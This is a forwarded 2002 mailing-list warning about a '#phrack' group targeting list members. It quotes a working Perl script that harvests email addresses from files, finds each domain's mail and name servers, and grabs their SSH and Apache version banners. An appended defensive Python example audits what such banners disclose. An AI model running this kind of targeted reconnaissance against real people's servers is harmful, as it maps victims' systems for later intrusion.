XXX Supplied by BIG GAY AL HUGER of #phrack XXX
-------------------------------------

----- Forwarded message from Dragos Ruiu -----

Delivered-To: xxxxxxxxxxxxxxxx
From: Dragos Ruiu
Organization: kyx.net
Subject: kyxspam: kiddie games
Date: Wed, 17 Jul 2002 12:27:05 -0700
X-Mailer: KYX-CP/M [version core00-mail-92]

(There is some small effort to find out where the kids are getting some kyx stuff from for their little games, but the url below should at least be a warning that you should check your servers, cause the kids seem to be spending an awful lot of time and energy on this list (must be nice). The below just looks like a way for some kids to get in trouble. But I agree with Greg, like what if no-one pays attention. Heh.

BTW please make sure to use the new to line. It's important that the address for halfdead be updated because Jim Jones has an account on phear.org.

Speaking of jj :-), GOBBLES emailed to make sure that I know that the turkeys and the el8 kids are not one and the same. Thanks... nice to know they care what I say. :-)

The below should be a little warning that some people appear to have too much time on their hands and not a lot of wisdom. It just looks like a way for some kids to get in trouble.
Ultimately, there seems to be a lot of anti-Honeynet (which for some reason they can't differentiate from this list) pent up rage in these little creatures... or is it fear that motivates? Caveat delivered...

Also please as a convenience to readers prefix subject lines to list with a kyxspam: label. Thanks.

p.s. Hi Max.

cheers,
--dr :-)

url: http://www.eurocompton.net/~fuk/phrack/own-kyx.pl

#!/usr/bin/perl
# usage: own-kyx.pl narc1.txt
#
# this TEAM #PHRACK script will extract the email addresses
# out of the narc*.txt files, enumerate the primary MX and NS
# for each domain, and grab the SSHD and APACHE server version
# from each of these hosts (if possible).
#
# For educational purposes only. Do not use.

use IO::Socket;

if ($#ARGV<0) {die "you didn't supply a filename\n";}
$nrq =$ARGV[0];

# anything that looks like user@domain
$msearch = '([^":\s<>()/;]*@[^":\s<>()/;\.]*.[^":\s<>()/;]*)';

open (INF, "$nrq") or die $!;
while(<INF>){
    if (m,$msearch,ig){push(@targets, "$&");}
}
close INF;

foreach $victim (@targets) {
    print "=====\t$victim \t=====\n";
    my ($lusr, $domn) = split(/@/, $victim);

    # first MX record returned for the domain
    $smtphost = `host -tMX $domn |cut -d\" \" -f7 | head -1`;
    $smtphost =~ s/[\r\n]+$//ge;
    print ":: Primary MX located at $smtphost\n";
    sshcheq($smtphost);
    apachecheq($smtphost);

    # first NS record returned for the domain
    $nshost = `host -tNS $domn |cut -d\" \" -f4 | head -1`;
    $nshost =~ s/[\r\n]+$//ge;
    sleep(3);
    print ":: Primary NS located at $nshost\n";
    sshcheq($nshost);
    apachecheq($nshost);
    print "\n\n";
    sleep(3);
}

# connect to port 22 and print any line of the reply containing "SSH"
sub sshcheq {
    (my $sshost) = @_;
    print ":: Testing $sshost for sshd version\n";
    $g = inet_aton($sshost);
    my $prot = 22;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n";
    if(connect(S,pack "SnA4x8",2,$prot,$g)) {
        my @in;
        select(S);
        $|=1;
        print "\n";
        while(<S>){ push @in, $_;}
        select(STDOUT);
        close(S);
        foreach $res (@in) {
            if ($res =~ /SSH/) {
                chomp $res;
                print ":: SSHD version - $res\n";
            }
        }
    } else { return 0; }
}

# send a HEAD request to port 80 and print any reply line containing "ache"
sub apachecheq {
    (my $whost) = @_;
    print ":: Testing $whost for Apache version\n";
    $g = inet_aton($whost);
    my $prot = 80;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n";
    if(connect(S,pack "SnA4x8",2,$prot,$g)) {
        my @in;
        select(S);
        $|=1;
        print "HEAD / HTTP/1.0\r\n\r\n";
        while(<S>){ push @in, $_;}
        select(STDOUT);
        close(S);
        foreach $res (@in) {
            if ($res =~ /ache/) {
                chomp $res;
                print ":: HTTPD version - $res\n";
            }
        }
    } else { return 0; }
}

--kyx--

----- End forwarded message -----
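
For the "check your servers" advice in the message, the following added example (not part of the forwarded message or the script it quotes) takes the reply lines the script would print for a host, the SSH identification string and the HTTP Server header, and lists what each one discloses. The function names and the sample banners are constructed for illustration; the version numbers in them are made up.

```python
import re

# Constructed sample replies (not captured from any real host).
SAMPLE_SSH = ["SSH-2.0-OpenSSH_9.9p9 Debian-0example1\r\n"]
SAMPLE_HTTP = [
    "HTTP/1.1 200 OK\r\n",
    "Server: Apache/9.9.9 (Unix) mod_ssl/9.9.9 OpenSSL/9.9.9x\r\n",
    "Content-Type: text/html\r\n",
]
SAMPLE_HTTP_MINIMAL = ["HTTP/1.1 200 OK\r\n", "Server: Apache\r\n"]

# SSH identification string: SSH-protoversion-softwareversion [SP comments]
SSH_ID = re.compile(r"^SSH-(?P<proto>[\d.]+)-(?P<software>\S+)(?: (?P<comment>.*))?$")
# Server header: product[/version] tokens and parenthesised comments
TOKEN = re.compile(r"(?P<name>[A-Za-z][\w.-]*)(?:/(?P<ver>[^\s()]+))?|\((?P<comment>[^)]*)\)")


def audit_ssh(lines):
    """Return (kind, value) pairs for what the SSH banner gives away."""
    findings = []
    for line in lines:
        m = SSH_ID.match(line.strip())
        if not m:
            continue
        if re.search(r"\d", m["software"]):
            findings.append(("ssh-software-version", m["software"]))
        if m["comment"]:
            # Typically a distribution name and package patch level.
            findings.append(("ssh-comment", m["comment"]))
    return findings


def audit_http(lines):
    """Return (kind, value) pairs for what the Server header gives away."""
    findings = []
    for line in lines:
        name, _, value = line.strip().partition(":")
        if name.lower() != "server":
            continue
        for m in TOKEN.finditer(value):
            if m["comment"] is not None:
                findings.append(("http-os-comment", m["comment"]))
            elif m["ver"]:
                findings.append(("http-product-version", f'{m["name"]}/{m["ver"]}'))
    return findings


if __name__ == "__main__":
    for kind, value in audit_ssh(SAMPLE_SSH) + audit_http(SAMPLE_HTTP):
        print(f"{kind}: {value}")
```

On Apache, `ServerTokens Prod` reduces the header to the bare product name, which is the case `SAMPLE_HTTP_MINIMAL` represents and for which `audit_http` reports nothing.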